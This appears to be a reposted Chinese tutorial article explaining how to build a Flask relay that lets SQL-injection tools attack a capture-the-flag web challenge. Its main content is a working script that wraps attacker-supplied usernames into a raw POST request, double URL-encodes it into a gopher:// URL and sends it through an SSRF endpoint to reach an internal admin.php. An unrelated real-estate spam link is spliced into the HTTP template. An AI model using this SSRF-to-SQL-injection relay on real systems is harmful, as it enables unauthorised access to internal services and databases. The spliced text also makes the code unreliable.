Python中怎么使用Flask实现中转注入

Python中怎么使用Flask实现中转注入，针对这个问题，这篇文章详细介绍了相对应的分析和解答，希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

　　1、常常会因为构造网络请求麻烦

　　2、写tamper嫌麻烦

　　这时候我们的中转注入就来了，这有一个Web题需要我们频繁构造gopher去实现POST或者GET请求，这时候如果我们想要实现更自由的SQL注入，便可使用

　　from flask import Flask,request

　　from urllib.parse import quote

　　import requests

　　def urlencode(s):

　　res=''

　　for c in s:

　　fuck=hex(ord(c)).split('0x')[1]

　　if len(fuck)==1:

　　fuck='0'+fuck

　　res+="%"+fuck

　　return res

　　fuckhtml='''POST /admin.php HTTP/1.1

　　Host: 127.0.0.1

　　Connection: close

　　Content-Type: application/x-www-form-urlencoded

　　Content-Length: {length}北海购房网 http://bh.goufang.com/

　　username={username}&password=129581926211651571912466741651878684928'''.replace("\n","\r\n")

　　tmpPayload= fuckhtml.split("\r\n")[-1]

　　tmplength = len(tmpPayload) - len('{username}')

　　url="http://eci-2zehhuwx9m3o88h42zup.cloudeci1.ichunqiu.com/ssrf.php?way=gopher%3A%2F%2F127.0.0.1:80%2F_"

　　app = Flask(__name__)

　　@app.route('/')

　　def hello_world():

　　username=request.args.get('username')

　　shit=fuckhtml.format(username=username,length=str(tmplength+len(username)))

　　cookies={'PHPSESSID':'qitbcj1puicm4qcpf8oe1fgc17'}

　　page=requests.get(url+urlencode(urlencode(shit)),proxies={'http':'http://127.0.0.1:8081'},cookies=cookies).text

　　return page

　　if __name__ == '__main__':

　　app.run()

关于Python中怎么使用Flask实现中转注入问题的解答就分享到这里了，希望以上内容可以对大家有一定的帮助，如果你还有很多疑惑没有解开，可以关注亿速云行业资讯频道了解更多相关知识。